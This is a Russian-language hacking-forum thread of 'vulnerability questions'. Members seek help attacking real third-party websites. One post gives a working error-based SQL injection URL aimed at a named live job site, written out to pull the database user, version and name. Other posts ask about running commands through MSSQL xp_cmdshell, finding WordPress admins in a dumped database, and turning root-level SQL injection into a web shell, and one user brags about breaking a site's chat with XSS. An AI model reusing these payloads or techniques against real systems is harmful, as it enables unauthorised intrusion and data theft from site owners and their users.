Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    google.com
     
  2. aadktnbaov

    aadktnbaov New Member

    Joined:
    6 Jun 2011
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0

    "раскрутили" ?
    я знаю сайт с подобной "дырой"
    ( см. мой пост http://forum.antichat.ru/showthread.php?p=3340983&posted=1#post3340983 )
     
  3. Creator000

    Creator000 New Member

    Joined:
    3 Jun 2012
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?

    ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?
     
  4. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    ставь локальный сервер и тесть сколько влезет

    можно сделать все что умеет JS
     
  5. Creator000

    Creator000 New Member

    Joined:
    3 Jun 2012
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    а чат где мне взять?
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    скачать денвер и усановить на комп
     
  7. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    все там же -> google.com
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent='
    чёт немогу скулю разкрутиь((
     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.

    А привести в читабельный вид слабо ?

    З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.
     
    _________________________
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    BigBear так пойдет?
    http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,user()),version(),database())),1,63)+,+ FLOOR(RAND(0)*2)))#

    P.S: У меня браузер как то сам в урленкод кидает когда, капирую с адресной строки...
     
    _________________________
    1 person likes this.
  11. Creator000

    Creator000 New Member

    Joined:
    3 Jun 2012
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Народ где взять чат на котором можно потестировать уязвимости?
     
  12. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    30
    Likes Received:
    7
    Reputations:
    0
    Вообщем такой вопрос, залил картинку в аватары на форуме, мне нужен полный путь к аватару, а там так
    а как получить полную ссылку?
     
  13. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Microsoft SQL Server
    2008 (SP2) - 10.0.4000.0 (Intel X86)
    Sep 16 2010 20:09:22 Copyright (c)
    1988-2008 Microsoft Corporation
    Enterprise Edition on Windows NT 6.0 <X86> (Build 6002: Service Pack 2)
    (VM)

    как выполнять команды в Microsoft SQL Server 2008 через mssql inj? например x p _ c m d s h e l l , какой должен стоять префикс вместо хp?
     
  14. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    немогу разобраться в wp где в дб посмотреть у какого юзера привы админа?у id=1 нету
     
  15. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    вроде где-то в таблице wp_usermeta
     
  16. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Таблица wp_users, поле user_status

    Вроде как так.
     
  17. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    User status че там? у всех нули..usermeta догадываюсь ,но не смог разобраться.вобщем вопрос-актуален
     
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    wp_users -> user_level

    Уровень админа = 10 (на старой версии, на новой пока нет Интернета проверить =/ )
     
    _________________________
    #21458 BigBear, 22 Nov 2012
    Last edited: 22 Nov 2012
  19. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    Совет

    Есть скуля, бд из под рута, виндовый сервак, стоит XAMPP, файловые привилеги есть, папки на запись нет, в phpinfo временного файла нет, magic_quotes ON, phpmyadmin нет, админка из локалки, рдп есть. Пробовал хэши вытащить, из repair не подходит...
    Нужен шелл, есть идеи?
     
  20. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Похожая проблема
    Есть скуль) права рут, file_priv Y, Сервак на винде ISS
    Есть папка на запись, phpmyadmin нету = \ удаленно не подконектишся к бд
    Проблема в magic_quotes ON
    Есть варианты как залить? : )
     
Thread Status:
Not open for further replies.